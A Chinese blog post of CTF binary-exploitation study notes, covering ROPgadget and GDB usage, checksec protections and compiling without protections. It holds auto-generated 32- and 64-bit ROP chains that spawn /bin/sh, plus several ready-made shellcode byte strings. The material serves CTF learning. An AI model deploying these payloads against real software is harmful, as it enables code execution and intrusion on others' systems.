PWN PWN PWN !!! 技巧 (2)

最新推荐文章于 2024-07-22 14:49:16 发布
最新推荐文章于 2024-07-22 14:49:16 发布
阅读量425 收藏 5
点赞数 7
分类专栏: PWN 文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Xzzzz911/article/details/133955187
版权

Pwn Pwn Pwn!!! 技巧(1)

简介:

紧接上次技巧(1),这次总结一些工具的用法和模板,俗话说好记性不如烂笔头,记录一手

环境

32位

context(log_level = 'debug',arch = 'i386',os = 'linux')

64位

context( log_level = 'debug',arch = 'amd64',os = 'linux' )

 查找程序所动态链接的库

ldd 文件名

ROPgadget

在构造rop链的时候,需要一些寄存器的地址,就可以用下面的命令:

ROPgadget --binary 文件名 | grep 'ret'     #注意ret是可以改成别的欧,像rdi,rsi寄存器啥的

在遇到静态链接的时候,往往用ROPgadget搜索就会出现一大堆地址,这个时候就需要区分一下

ROPgadget --binary 文件名 --only "pop|ret" | grep 'eax'   #根据自己的需要进行改动

如果是做ret2syscall就需要binsh,in 0x80,就用如下命令:

ROPgadget --binary 文件名 --string '/bin/sh' 

ROPgadget --binary 文件名 --string 'sh'

ROPgadget --binary 文件名 --string 'int 0x80'

ROPgadget还可以直接构造rop链(主要争对的是静态链接)

ROPgadget --binary 文件名 --ropchain

32位

# Padding goes here
p = b''

p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080b8016) # pop eax ; ret
p += b'/bin'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea064) # @ .data + 4
p += pack('<I', 0x080b8016) # pop eax ; ret
p += b'//sh'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080de769) # pop ecx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0806c943) # int 0x80

64位

# Padding goes here
p = b''

p += pack('<Q', 0x000000000040a30d) # pop rsi ; ret
p += pack('<Q', 0x000000000049d0c0) # @ .data
p += pack('<Q', 0x0000000000419a1c) # pop rax ; ret
p += b'/bin//sh'
p += pack('<Q', 0x000000000041ac41) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x000000000040a30d) # pop rsi ; ret
p += pack('<Q', 0x000000000049d0c8) # @ .data + 8
p += pack('<Q', 0x0000000000417e25) # xor rax, rax ; ret
p += pack('<Q', 0x000000000041ac41) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x0000000000401d1d) # pop rdi ; ret
p += pack('<Q', 0x000000000049d0c0) # @ .data
p += pack('<Q', 0x000000000040a30d) # pop rsi ; ret
p += pack('<Q', 0x000000000049d0c8) # @ .data + 8
p += pack('<Q', 0x0000000000401858) # pop rdx ; ret
p += pack('<Q', 0x000000000049d0c8) # @ .data + 8
p += pack('<Q', 0x0000000000417e25) # xor rax, rax ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000450860) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000401243) # syscall

Onegadget

one_gadget  libc版本

Seccomp

存在沙箱,就需要注意两点,第一点就是return ALLOW(allow也就是允许可行),第二点就是return KILL(kill也就是杀死禁止)

seccomp-tools dump ./文件名

readelf

readelf -S ./111 | grep bss     查看可读可写的bss段

shellcode

可以用工具编写shellcode(划重点,唯一需要注意的就是环境,不标注环境默认为32位的,让雨果遇到64位shellcode的题目,就需要标注环境,上面有自己翻)

shellcode =asm(shellcraft.sh())

也可以自己找www.exploit-db.com(根据题目的要求,选取适合的字节)

# 32位 短字节shellcode --> 21字节
\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80
 
# 32位 纯ascii字符shellcode
PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJISZTK1HMIQBSVCX6MU3K9M7CXVOSC3XS0BHVOBBE9RNLIJC62ZH5X5PS0C0FOE22I2NFOSCRHEP0WQCK9KQ8MK0AA
 
# 32位 scanf可读取的shellcode
\xeb\x1b\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x29\xc0\xaa\x89\xf9\x89\xf0\xab\x89\xfa\x29\xc0\xab\xb0\x08\x04\x03\xcd\x80\xe8\xe0\xff\xff\xff/bin/sh
 
# 64位 scanf可读取的shellcode 22字节
\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05
 
# 64位 较短的shellcode  23字节
\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05
 
# 64位 纯ascii字符shellcode
Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t

GDB

plt

查看 plt 表内容

got

查看 got 表内容

vmmap

vmmap – 可以用来查看栈、bss段是否可以执行

distance

用于计算两地址的距离

distance 地址 地址

disassemble

用于查看某段代码的汇编指令

disassemble 地址

attach

 调试

gdb.attach(p)    

print

查看变量地址

print 函数名

其他

gcc命令生成可执行文件

gcc <c文件名> -o <生成的可执行文件名>

gcc编译运行c文件(Linux系统)

1、新建.c文件

2、在当前目录下打开终端

3、输入指令:gcc  -c  文件名.c

     gcc  文件名.o  -o 文件名

     ./文件名

不开启PIE保护

gcc -fno-stack-protector -no-pie -s test.c -o test  

Relro

Full Relro(重定位表只读)
Relocation Read Only, 重定位表只读。重定位表即.got 和 .plt 两个表。

Stack

No Canary found(能栈溢出)

NX

NX enable(不可执行内存)
Non-Executable Memory,不可执行内存

PIE

PIE enable(开启ASLR 地址随机化)
Address space layout randomization,地址空间布局随机化,通过将数据随机放置来防止攻击

总结:

水平一直停滞不前,一直在原地踏步,放松心情,加油加油!!!

Xzzzz911
关注
  • 7
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
PWN PWN PWN !!! 技巧 (1)
Xzzzz911的博客
10-06 1204
多做pwn,多总结,加油,冲冲冲!!!
PWN PWN PWN !!! 技巧 (4)
Xzzzz911的博客
10-29 948
紧接上述技巧(1),技巧(2)和技巧(3),这次总结一些常用的命令,重定向和一些整数溢出需要了解的知识点,还有一些接收发送的命令多做多总结,慢慢的要开始进攻堆了,加油加油,冲冲冲!!!
PWN我要入门!!!
sinat_31884905的博客
05-19 170
一.攻防世界新手区 hello_pwn 覆盖掉数据 常规操作的两步 . 本地打通 远程打通content=0 此时运行脚本 练习本地打穿 from pwn import * context(os='linux',arch="amd64",log_level="debug") content=1 def main(): if content == 1: wjk=process('./hello_pwn') else: wjk = remote
pwn的一些技巧
qq_41696518的博客
09-02 1039
一些pwn的小技巧,会持续扩展更新
PWN —— ret2libc2
qq_41696518的博客
07-03 287
ret2libc2
PWN PWN PWN !!! 技巧 (5)
Xzzzz911的博客
11-02 584
紧接上续四部,这次准备记录一下常见的函数的功能(容易忘记,记录一手),好记性不如烂笔头了解函数的作用,可以更好的让我们在代码审计的过程理清程序的之间的逻辑,加油加油!!!
pwn之stack2
醉等佳人归
09-07 373
1.题目 1.保护机制 开了canary和nx 2.题目 简单来说就是一个计算器,支持以下功能: 2.思路 重点1:问题出在第三个功能上,第三个功能是支持修改数组中的元素的,但函数没有进行index判断,导致我们通过这个偏移写任意数据到任意偏移地址,即可以覆盖函数返回地址 重点2:程序中给了一个后门函数,但是运行后发现没有/bin/bash,所以我们要自己调用system,参数的话直接使用/bin/bash中的sh即可 from pwn import * context(arch="i386",os=
pwn ——ret2libc3
qq_41696518的博客
07-06 809
ret2libc3
ARM pwn 入门 (2)
CoLin的pwn小屋
11-02 1246
ARM pwn 入门 (2) —— 第一道ARM pwn
pwn07.ret2syscall例题
11-11
ret2syscall例题
入门pwn题目ret2text
03-26
入门pwn题目ret2text
ret2libc2pwn 入门题
02-11
pwn 入门题
pwn ubuntu18的运行环境自己搭建
11-15
pwn ubuntu18的运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
PWN.rar_PWN
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8342
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
粉尘传感器助力面粉厂安全生产
iotsensor的博客
07-19 592
OPC-R2有16个大小的垃圾箱,可以每秒记录PM1、PM2.5和PM10以及大小直方图,这在应用程序需要的不仅仅是PM时至关重要。OPC-R2取代了OPC-R1,带来了比其前身更好的小颗粒检测、更低的风扇噪声和更好的EMC保护。因此,如何有效监测和控制面粉厂的粉尘浓度,成为了保障安全生产的关键。这种传感器能够实时、准确地监测空气中的粉尘浓度,并将数据反馈给控制系统,从而实现对粉尘浓度的有效控制。通过实时监测和控制粉尘浓度,可以有效保障工作人员的健康、设备的安全运行以及环境的保护。
Lianwei 安全周报|2024.07.22
最新发布
联蔚盘云的博客
07-22 620
新的一周又开始了,以下是本周「Lianwei周报」,我们总结推荐了本周的政策/标准/指南最新动态、热点资讯和安全事件,保证大家不错过本周的每一个重点!
内容安全(深度行为检测技术、IPS、AV、入侵检测方法)
Thewei666的博客
07-17 1206
区分不同的签名。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值